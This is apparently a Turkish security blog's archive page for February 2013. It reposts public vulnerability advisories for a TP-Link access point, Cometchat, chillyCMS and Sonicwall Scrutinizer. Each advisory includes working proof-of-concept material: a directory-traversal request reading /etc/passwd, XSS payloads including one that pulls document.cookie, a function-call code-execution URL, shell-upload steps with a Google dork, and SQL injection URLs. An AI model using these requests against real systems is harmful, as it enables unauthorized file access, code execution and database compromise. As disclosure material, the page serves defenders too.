Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Python Exploit Read more
Archive for 15 Şubat 2013
Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit
Category: Genel | Tags: Photodex ProShow Producer v5.0.3297 Local Exploit
TP-Link TL-WA701N / TL-WA701ND – Multiple Vulnerabilities
TP-Link TL-WA701N / TL-WA701ND – Roter'lerde açıklar bulunmuş olup, açık sayesinde /etc/passwd okunabilmekte XSS açığı oluşmaktadır.
Device Name: TL-WA701N / TL-WA701ND Vendor: TP-Link ============ Vulnerable Firmware Releases: ============ Firmware Version: 3.12.6 Build 110210 Rel.37112n Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012 Hardware Version: WA701N v1 00000000 Model No.: TL-WA701N / TL-WA701ND Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1 ============ Vulnerability Overview: ============ * Directory Traversal: Access local files of the device. For example you could read /etc/passwd and /etc/shadow. Request: GET /help/../../etc/passwd HTTP/1.1 Host: 192.168.178.2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.2/help/ ==> > no authentication needed!!! Response: HTTP/1.1 200 OK Server: TP-LINK Router Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD> <TITLE> TL-WA701N </TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"> <!-- if(window.parent == window){window.location.href="http://192.168.178.2";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--> </SCRIPT> root:x:0:0:root:/root:/bin/sh Admin:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:65534:65534:nobody:/home:/bin/sh ap71:x:500:0:Linux User,,,:/root:/bin/sh Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse * The request for changing the password is a HTTP GET and the username and password are parameters of this HTTP GET: http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save * Stored XSS: Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Wireless MAC Filtering -> Add or Modify -> put your XSS in the description (parameter Desc) Example Request: http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc="><img src="0" onerror=alert(1)> &Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save This XSS vulnerability was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/ * Stored XSS: -> System Tools -> SNMP: Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name= </script> &sys_location= <script> alert('XSSed') </script> &get_community=111&get_source=123&set_community=123&set_source=111&Save=Save ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-011 Twitter: The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse The stored XSS vulnerability in the Desc parameter was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/ ============ Time Line: ============ August 2012 - discovered vulnerability 06.08.2012 - reported vulnerability to TP-Link 14.02.2013 - public release ===================== Advisory end =====================
Category: Genel | Tags: TP-Link TL-WA701N / TL-WA701ND XSS Açığı
Cometchat Multiple Vulnerabilities
Cometchat chatroom.php scriptinde XSS açığı bulunmuş olup açık hakkında açıklamalar ve açığın kullanımı şu şekilde;
################################################################################## __ _ _ ____ / /___ _____ (_)_____________ ______(_)__ _____ / __ _________ _ __ / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/ / /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ / ____/__,_/_/ /_/_/____/____/__,_/_/ /_/___/____(_)____/_/ __, / /____/ ################################################################################## Cometchat chat Application All Version Multiple Vulnerabilities Cometchat is a chat application which in use Vbulletin,Xenforo,SMF,MyBB and other integrated scripts App Homepage : http://www.cometchat.com Author(Pentester): B127Y Special Thanks : Burtay and All Janissaries Team(Burtay,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) Jani Exploit id 1 (http://www.janissaries.org/exploits/1) ################################################################################## 1.)Code Execution P0C (modules/chatrooms/chatrooms.php) call_user_func call_user_func($_GET['action']); Can use all php functions and cometchat function without arguments Live Demo:http://server/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo 2.)XSS P0C (plugins/handwrite/index.php) echo echo < < <EOD <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title> Download </title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <style> html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td { margin: 0; padding: 0; border: 0; outline: 0; font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit; vertical-align: baseline; text-align: center; } html { height: 100%; overflow: hidden; /* Hides scrollbar in IE */ } body { height: 100%; margin: 0; padding: 0; } #flashcontent { height: 100%; } </style> </style> </head> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="100%" height="100%" align="middle" id="main"> <param name="allowScriptAccess" value="sameDomain" /> <param name="movie" value="handwriting.swf" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="FlashVars" value="tid={$toId}" /> <param name="scale" value="exactFit" /> <embed src="handwriting.swf" width="100%" height="100%" autostart="false" quality="high" bgcolor="#ffffff" FlashVars="tid={$toId}" name="main" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /> </object> </body> </html> EOD; $toId = $_GET['id']; Live Demo:http://server/cometchat/plugins/handwrite/index.php?id="> <script> alert(document.cookie) </script>
Category: Genel | Tags: Cometchat XSS Açığı
chillyCMS 1.3.0 – Multiple Vulnerabilities
chillyCMS 1.3.0 Versiyonunda zip uzantılı dosya php uzantıya çevrilmek suretiyle shell upload açığı oluşmuş olup, açık hakkında açıklamalar şu şekilde;
# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities # Google Dork: "powered by chillyCMS" # Date: 15 February 2013 # Exploit Author: Abhi M Balakrishnan # Vendor Homepage: http://chillycms.bplaced.net/ # Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip # Version: 1.3.0 # Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8 # Video: ?v=6B3rND9S75g # Vulnerability Failure to Restrict URL Access chillyCMS uses 302 redirects to restrict access to the unautorized pages. # Exploit Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/ Step 2: Access http://localhost/chillyCMS/admin/ # Vulnerability Arbitrary File Upload chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory # Exploit Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip Step 2: Upload shell.zip Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php # History 11 March 2012 - Discovered vulnerability and exploit, contacted the vendor. 12 March 2012 - Vendor responds back, exchanges few mails. 15 November 2012 - Vendor discontinues further development. 15 February 2013 - Published the vulnerabilities and exploits to the public. # How to reproduce The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files.
Category: Genel | Tags: chillyCMS 1.3.0 shell Upload Açığı
Sonicwall Scrutinizer v9.5.2 – SQL Injection Vulnerability
Sonicwall Scrutinizer v9.5.2 – SQL Injection Açığı bulunmuş Olup Açığın oluşum yeri ve Açık hakkındaki açıklamalar aşağıdaki gibidir;
Title: ====== Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability Date: ===== 2013-02-13 References: =========== http://www.vulnerability-lab.com/get_content.php?id=789 #9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon) #10149: Create a common function to escape characters that can be used for SQL injection #10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped #10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped #10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped VL-ID: ===== 789 Common Vulnerability Scoring System: ==================================== 7.3 Introduction: ============= Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments. (Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html ) Abstract: ========= The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application. Report-Timeline: ================ 2012-12-05: Researcher Notification & Coordination 2012-12-07: Vendor Notification 2013-01-08: Vendor Response/Feedback 2013-02-10: Vendor Fix/Patch 2013-02-11: Public Disclosure Status: ======== Published Affected Products: ================== DELL Product: Sonicwall OEM Scrutinizer 9.5.2 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms. The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or gadget parameters. Exploitation requires no user interaction & without privileged application user account. Successful exploitation of the remote sql vulnerability results in dbms & application compromise. Vulnerable File(s): [+] fa_web.cgi Vulnerable Module(s): [+] gadget listing Vulnerable Parameter(s): [+] orderby [+] gadget Proof of Concept: ================= The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account and also without user interaction. For demonstration or reproduce ... PoC: http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27 http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27 Solution: ========= 1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query 2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection Risk: ===== The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri () Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: - - Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: - - Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact ( or ) to get a permission. Copyright � 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT:
Category: Genel | Tags: Sonicwall Scrutinizer v9.5.2 SQL Açığı